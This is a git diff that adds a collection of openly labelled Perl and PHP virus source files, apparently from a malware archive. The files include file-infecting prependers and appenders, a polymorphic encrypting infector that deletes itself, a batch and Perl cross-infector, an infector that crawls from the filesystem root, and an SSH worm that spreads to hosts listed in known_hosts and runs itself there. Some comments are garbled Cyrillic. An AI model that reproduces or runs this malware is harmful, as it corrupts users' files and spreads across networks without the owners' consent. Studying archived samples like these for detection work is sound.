уже ф йл? + + open(TARGET,"<$name"); # жертв + $allready_infected = 0; + while () { + if (index($_,"\x23 Intender by -Byst- (c) 1999") == 0) + { $allready_infected = 1;} # уже инфициров н! + } + close(TARGET); + if ($allready_infected == 1 ) + { next;} # переходим к следующей жертве + + # Проверим, нет ли в теле жертвы строк тип !/usr/bin/perl + open(TARGET,"<$name"); # жертв + $flag = 0; + while () { + if (index($_,"\x23!") == 0) # Н шли т кую строку + { $flag = 1;} # взводим фл г + } + close(TARGET); + + # Созд ем ч сть в которой содержится вызов процедуры инфициров ния + open(TARGET,"<$name"); # жертв + open(FBUF,">$cname"); # промежуточный ф йл + + if ($flag == 1) { # у жертвы есть обозн чение н ч л прогр ммы? + while () { # ищем его + print(FBUF); # сохр няем все строки жертвы до #! + if (index($_,"\x23!") == 0 ) # г , вот и н ч ло прогр ммы + { last;} + } + } + + # ищем тел процедур + $_ = "\n";print(FBUF); + open(SOURCE,"<$source"); # т кующий ф йл + while() { # ищем призн к н ч л - "#here virus starts" + if (index($_,"\x23here virus starts") == 0) { last;} + } + print(FBUF); + # весь текст процедур -> промежуточный ф йл + while () { + print(FBUF); + if (index($_,"\x23here virus ends") == 0) { last;} + } + close(SOURCE); + $_ = "\n";print(FBUF); + # ост вшуюся ч сть жертвы -> промежуточный ф йл + while () { + print(FBUF); + } + close(TARGET); + close(FBUF); + rename($cname,$name); +} +#here virus ends + + diff --git a/Perl/Virus.Perl.Nars b/Perl/Virus.Perl.Nars new file mode 100644 index 00000000..93ee439e --- /dev/null +++ b/Perl/Virus.Perl.Nars @@ -0,0 +1,43 @@ +Perl.Sran + +qwerty();# + +sub qwerty { + +a: while (<*.pl>) + { + my $oF = "qwerty"; + my $tN = "$ENV{\"HOME\"}/tmp/".crypt($_, $_), $oN = "./$_", $nF = crypt($_, $oF); + + open (WE, "<$0"); + open (IFILE, "<$_"); + open (TEMP, ">$tN"); + + while () + { + chomp; + if (/\#!Sran/) { unlink ($tN); next a } + elsif (!/#!\//) { print TEMP "$_\n" } + else { print TEMP "$_ #!Sran\n$nF();\n" } + } + + while () + { + $st = ""; + + s/#[0-9].*/$st/; + if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/} + next if (/#!\/usr\/bin\/perl/ || /qwerty();#/ || !$cW); + if (int(rand(2))) { $st=" #".crypt($_, rand(256)) } + else {$st = ""} + + chomp; + print TEMP "$_$st\n"; + } + + unlink ($oN); + rename ($tN, $oN); + chmod (0777, $oN); + } +} + diff --git a/Perl/Virus.Perl.Nirvana b/Perl/Virus.Perl.Nirvana new file mode 100644 index 00000000..4a86199a --- /dev/null +++ b/Perl/Virus.Perl.Nirvana @@ -0,0 +1,30 @@ +# Nirvana RuLeZ the world +# PERL.Nirvana +# by Second Part To Hell + +# Thanks to SnakeByte for your tutorial! + +open(file,$0); +@nirvana=; +@nirvana=@nirvana[0...31] +close(file); + +foreach $FileName (<*>) +{ + if ((-r $FileName) && (-w $FileName) && (-f $FileName)) + { + open (File, "$FileName"); + @Lithium=; + close(File); + if ((@Lithium[1] =~ "Nirvana") or (@Lithium[2] =~ "Nirvana")) + { + if((@Lithium[0] =~ "perl",,i) or (@Lithium[1] =~ "perl",,i)) + { + open(sliver, ">$FileName"); + print sliver @Nirvana; + print sliver @Litium; + close (sliver); + } + } + } +} diff --git a/Perl/Virus.Perl.Qwax b/Perl/Virus.Perl.Qwax new file mode 100644 index 00000000..f197a618 --- /dev/null +++ b/Perl/Virus.Perl.Qwax @@ -0,0 +1,90 @@ +") != 0) + { + if ($bracket_found) + { + break; + } + else + { + $bracket_found = true; + } + + } + } + else if (strrpos($s, "QAZWSX") != 0) + { + $found = true; + $self = $s; + } + +} + +fclose($sf); + +Infect($DOCUMENT_ROOT."/"); + + ?> \ No newline at end of file diff --git a/Perl/Virus.Perl.Rans.a b/Perl/Virus.Perl.Rans.a new file mode 100644 index 00000000..019e8777 --- /dev/null +++ b/Perl/Virus.Perl.Rans.a @@ -0,0 +1,41 @@ + +qwerty();# + +sub qwerty { + +a: while (<*.pl>) + { + my $oF = "qwerty"; + my $tN = "$ENV{\"HOME\"}/tmp/".crypt($_, $_), $oN = "./$_", $nF = crypt($_, $oF); + + open (WE, "<$0"); + open (IFILE, "<$_"); + open (TEMP, ">$tN"); + + while () + { + chomp; + if (/\#!Sran/) { unlink ($tN); next a } + elsif (!/#!\//) { print TEMP "$_\n" } + else { print TEMP "$_ #!Sran\n$nF();\n" } + } + + while () + { + $st = ""; + + s/#[0-9].*/$st/; + if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/} + next if (/#!\/usr\/bin\/perl/ || /qwerty();#/ || !$cW); + if (int(rand(2))) { $st=" #".crypt($_, rand(256)) } + else {$st = ""} + + chomp; + print TEMP "$_$st\n"; + } + + unlink ($oN); + rename ($tN, $oN); + chmod (0777, $oN); + } +} diff --git a/Perl/Virus.Perl.Rans.b b/Perl/Virus.Perl.Rans.b new file mode 100644 index 00000000..0f3c418a --- /dev/null +++ b/Perl/Virus.Perl.Rans.b @@ -0,0 +1,47 @@ +sadBVa(); + +print "This is also a test.\n"; + +sub sadBVa { #21wZPocL9r3I2 + #25lj6HLJr3lR. + goto b if($ENV{"USER"} eq "root"); #403dRcOOEKV7c + #53a2B3OFfBrvE +a: while (<*.pl>) + { #11zR6D0l39gH2 + my $oF = "sadBVa"; #21wZPocL9r3I2 + my $tN = crypt($_, $_), $cW = 0; $oN = "./$_", $nF = $tN; #23xTGZMRTRgO. + #73QebE0Q0ZZ7Q + open (WE, "<$0"); + open (IF, "<$_"); #19ffqqT32W0N6 + open (TMP, ">$tN"); #21wZPocL9r3I2 + #46uAWbWZGiwdE + $nF =~ s/[0-9.\/].*/a/; + #20DFf8jQEuujI + while () + { + chomp; #17rFB3rla0OL. + if (/\#!Sran/) { unlink ($tN); next a } + elsif (!/#!\//) { print TMP "$_\n" } + else { if(!/-X/){$_ .= " -X"} print TMP "$_\n#!Sran\n$nF();\n" } + } #14HPto765IJGs + #56usvbQbO.V7g + while () + { + $st = ""; #16DEAzgu4U/Lg + #21wZPocL9r3I2 + s/#[\d].*/$st/; + if (/sub $oF/ || /my \$oF =/) { $cW = 1; s/$oF/$nF/} + next if (/#!\// || /$oF();/ || !$cW); + if (int(rand(2))) { $st=" #".crypt($tN, rand(256)) } + else {$st = ""} #24kfAR.q3vZXI + + chomp; #19ffqqT32W0N6 + print TMP "$_$st\n"; #130lOPyQngaJw + } + #21wZPocL9r3I2 + unlink ($oN); + rename ($tN, $oN); + chmod (0777, $oN); + } +b: #24kfAR.q3vZXI +} #25lj6HLJr3lR. diff --git a/Perl/Virus.Perl.SSHWorm b/Perl/Virus.Perl.SSHWorm new file mode 100644 index 00000000..6f3dcfff --- /dev/null +++ b/Perl/Virus.Perl.SSHWorm @@ -0,0 +1,56 @@ +############### + +## +# sshworm - example of a trusted host/key ssh worm +# +# This is extremely primitive and rarely works on anything +# but identical systems running the same versions of ssh. +# It does show how using unencrypted RSA keys for user auth +# across an enterprise can be a really bad thing. Eventually +# you should be able to let this guy go running as root on any +# given system, it will locate each user's known_hosts and +# attempt to gain accesss, reporting its path to a central system. +# +## + + +use FindBin qw{$Bin}; + + +print ":: sshworm initialized at $Bin\n"; + + + +$options = " -o PasswordAuthentication=no "; + +## +# stage 1 - attempt to connect to all hosts in known_hosts files +## + +if (open (KH, "<" . $ENV{'HOME'} . "/.ssh/known_hosts")) +{ + while ($line = ) + { + ($host, undef) = split(/\s+/,$line); + ($host, undef) = split(/\,/,$host); + Propagate($host); + } + close (KH); +} + + +sub Propagate { + + open (SSH, "ssh $options $host 'id' 2>/dev/null|"); + while ($out = ) + { + if ($out =~ /uid/) + { + print ":: sshworm found new host $host\n"; + system("scp $Bin/$0 $host:/tmp/hello.pl"); + system("ssh $host 'perl /tmp/hello.pl'"); + } + } + close (SSH); +} + diff --git a/Perl/Virus.Perl.Sillycross.a b/Perl/Virus.Perl.Sillycross.a new file mode 100644 index 00000000..8b7efc61 --- /dev/null +++ b/Perl/Virus.Perl.Sillycross.a @@ -0,0 +1,35 @@ +#genetix + +#*.bat *.cmd *.pl crossinfector prepender + +$TheCode = __FILE__; +$batpart = " +for %%a in (*.bat *.cmd *.pl) do copy %0 %%a +"; + +my @Vcode = (); +open(Host, $TheCode); +@Vcode = ; +while() { + $. > 36 ? last : push @Vcode,$_; +} +close(Host); + +while (<*.bat *.cmd *.pl>) { +$Victim = $_; + + my @VicCode = (); + open(Target, $Victim); + @VicCode = ; + while() { + $. > 36 ? last : push @VicCode,$_; + } + close(Target); + + if (@VicCode[1] !~ "#genetix") { + open(Target, ">$Victim"); + print Target @Vcode,@VicCode; + close(Target); + + } +} \ No newline at end of file diff --git a/Perl/Virus.Perl.Spoon b/Perl/Virus.Perl.Spoon new file mode 100644 index 00000000..0e3edabc --- /dev/null +++ b/Perl/Virus.Perl.Spoon @@ -0,0 +1,43 @@ +use File::Find; +&virus(); + +print "\nThis program is infected by the Perl virus\n\n"; + +sub virus + { + my ( $pid, $new ); + if( $pid = fork ) { return; } + else + { + open( source, $0 ); + finddepth ( \&infect, '/home/chris/test' ); + sub infect + { + open target, "$File::Find::name"; + $_ = ; + if ( /(\#!.*perl)/ ) + { + $_ = ; + if( $_ ne "use File::Find;\n" ) + { + $new = $1 . "\nuse File::Find;\n&virus();\n" . $_; + while( ) { $new = $new . $_; } + seek( source, 0, 0 ); + while( ne "sub virus\n" ) { }; + $new = $new . "\nsub virus\n"; + while( ) { $new = $new . $_; } + close target; + open target, ">$File::Find::name"; + print target $new; + } + } + close( target ); + } + close( source ); + exit( 0 ); + } + } + +# a Perl virus, by paddingx +# 08/15/1999 + diff --git a/Perl/Virus.Perl.Spoon.b b/Perl/Virus.Perl.Spoon.b new file mode 100644 index 00000000..2e2cdf59 --- /dev/null +++ b/Perl/Virus.Perl.Spoon.b @@ -0,0 +1,38 @@ +use File::Find; +&virus(); + +print "\nThis program is infected by the Perl virus\n"; + +sub virus +{ + $virus_body = "\n# put here the body of the virus\nsub virus { }\n"; + if( $pid = fork ) { return; } + else + { + finddepth ( \&infect, '/' ); + sub infect + { + open( target, $File::Find::name ); + $_ = ; + if ( /(\#!.*perl)/ ) + { + $line2 = ; + unless( $line2 eq "use Find::File\n" ) + { + open( temp, ">/tmp/tmpinfect" ); + print temp ($1, "\nuse File::Find;\n&virus();\n", $line2 ); + print temp while( ); + print temp $virus_body; + close( temp ); + system( "mv", "/tmp/tmpinfect", $File::Find::name ); + } + } + close( target ); + } + exit( 0 ); + } +} + +# a Perl virus, by paddingx +# 08/13/1999 + diff --git a/Perl/Virus.Perl.Tict b/Perl/Virus.Perl.Tict new file mode 100644 index 00000000..8009e959 --- /dev/null +++ b/Perl/Virus.Perl.Tict @@ -0,0 +1,91 @@ +# 1st Poly Virus by SnakeByte [Matrix/KryptoCrew] +open(File,$0);@Virus=;close(File); # read own code +$Virus=join("", @Virus);foreach $FileName(<*>) { # get files +if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { # check file +open(File, "$FileName");@Temp=;close(File); # open file +if ((@Temp[0] =~ /perl/i ) && ( substr(@Temp[0],0,2) eq "\#!" )) { # perl file ? +if (( length(@Temp[0]) % 5 ) != 0 ){ # already infected ? + # first we generate a decryptor + +$Key = int(rand(255)); # cryptkey +$crypttype = int(rand(2)); # how to crypt it ? + +for ( $X = 0; $X < length($Virus); $X++ ){ # Encrypt it +if ( $crypttype == 0 ){ +@Crypt[$X] = (ord(substr($Virus, $X, 1))) * ($Key); # Multiply +} else { +@Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key); # Addition +} +} + +$connectit = chr(int(rand(25)+65)); +$VirString = join($connectit, @Crypt); # all values get seperated by a ! +$filename = chr(int(rand(25)+65)); # random filename to put virus to +$filename .= int(rand(65535)); + if ( int(rand(2)) == 0 ){ + @Vir[0] = "\$l1l = \"$VirString\"\;"; + @Vir[1] = "\$11l = $Key\;"; # key to decrypt + } else { + @Vir[0] = "\$11l = $Key\;"; # key to decrypt + @Vir[1] = "\$l1l = \"$VirString\"\;"; + } + @Vir[2] = "\@ll1 = split(\"$connectit\", \$l1l)\;"; + @Vir[3] = "for ( \$lll = 0\; \$lll < (\@ll1)\; \$lll++ ) { "; # Decrypt Loop + + if ( $crypttype == 0 ){ + @Vir[4] = " \$l11 .= chr(\@ll1[\$lll] \/ \$11l)\;"; # Decrypt Char + } else { + @Vir[4] = " \$l11 .= chr(\@ll1[\$lll]-\$11l)\;"; # Decrypt Char + } + @Vir[5] = "}"; + @Vir[6] = "open(1l1, \">$filename\")\;"; # write encrypted + @Vir[7] = "print 1l1 \$l11\;"; # string to a file + @Vir[8] = "close(1l1)\;"; + @Vir[9] = "\$lll = \`perl $filename\`;\n"; # and start it + + # change variables + # $Virus File @Virus $X $Key $Vir + # l1l 1l1 ll1 lll 11l l11 +@vars = ("l1l", "1l1", "ll1", "lll", "11l", "l11"); # replace the variables +foreach $replace (@vars){ + $newVar = chr(int(rand(25)+65)); # with a letter + $newVar .= int(rand(65535)); # and a random number + for ( $b=0; $b < @Vir; $b++){ + @Vir[$b] =~ s/$replace/$newVar/g ; + } +} + + +do { + chomp @Temp[0]; + @Temp[0] .= " \n"; +} until((length(@Temp[0]) % 5) == 0 ); + + +open(File, ">$FileName"); # and write the infected +$Temp = join("\n", @Vir); + + +for ( $X = ( (@Temp) >> 1 ); $X < @Temp; $X++ ){ + if ( @Temp[$X] =~ "\;\n" ) { # insert virus in the middle + $Temp2 = join("", @Temp[0..$X]); # write first part + print File $Temp2; # and virus + print File $Temp; $X++; + $Y = (@Temp); + $Temp2 = join("", @Temp[$X..$Y]); # insert rest of the file + print File $Temp2; + goto CloseFile; + } +} + + $Temp2 = join("", @Temp); # no possibility to insert virus + print File $Temp; # file back to disk + print File $Temp2; # without EPO + + +CloseFile: + close(File); +}}}} + +$a = `rm $0`; # delete our selves.. + diff --git a/Perl/Virus.Perl.Vich b/Perl/Virus.Perl.Vich new file mode 100644 index 00000000..8b279069 --- /dev/null +++ b/Perl/Virus.Perl.Vich @@ -0,0 +1,87 @@ +#onehalf3554 + +# this perl virus (c)Chernickevich Konstantin +# http://onehalf.hotmail.ru +# email:onehalf3554@mail.ru + + + +system"clear"; +$partone="#End_my"; +$parttwo="_body"; +$EndMarker=$partone.$parttwo; +$infected=0; +$BodyCopy=0; +$textold=""; + +# this "while" for detecting *.pl file +# and output in the $_ local perl variable + +while (<*.pl>) +{ + +$files=$_; +$text="<".$_; +$textw=">".$_; +$textww=">>".$_; + + + open(TESTFILE,$text); + until(eof(TESTFILE)) + { + $strres=readline(TESTFILE); + + +# this procedure detecting a marker in the *.pl file +# if marker detected then file infected if not then file not infected! + + if ($strres=~ m/onehalf3554/i) + { + if ($BodyCopy==0) + { + $BodyCopy=1; + open(VIRUSBODY,$text); + until ($BodyStr=~ m/$EndMarker/i) + { + $BodyStr=readline(VIRUSBODY) ; + $BodyLoopCount++; + $BodyArray[$BodyLoopCount]=$BodyStr; + } + close(VIRUSBODY); + } + $infected=1; + } + } +close (TESTFILE); + +if ($infected==1) +{ +print "[im detecting old infecting file :]\n"; +print $textw." infected old time.[Ok]\n"; +open(RESERVBODY,">body.bod"); +print RESERVBODY @BodyArray; +close(RESERVBODY); +} + + + if ($infected==0) + { + print $textw."im trying infecting this file now! \n"; + system "cp ".$files." temp.bod"; + open(NULFILE,$textww); + $NUL=""; + print NULFILE $NUL; + system "cp body.bod"." ".$files; + open(DATAFILE,"; +#BlackJack +@Virus=@Vir[-23...-1]; +close(File); +foreach $FileName (<*>) +{ +if ((-r $FileName) && (-w $FileName) && (-f $FileName)) +{ +open(fuck, "$FileName"); +@aFucks=; +close(fuck); +if ((@aFucks[0] =~ "perl") || (@aFucks[1] =~ "perl")) +{ +if ( not (@aFucks[-21] =~ "BlackJack")) +{ +open(fuck, ">>$FileName"); +print fuck @Virus; +close(fuck); +} +} +} +}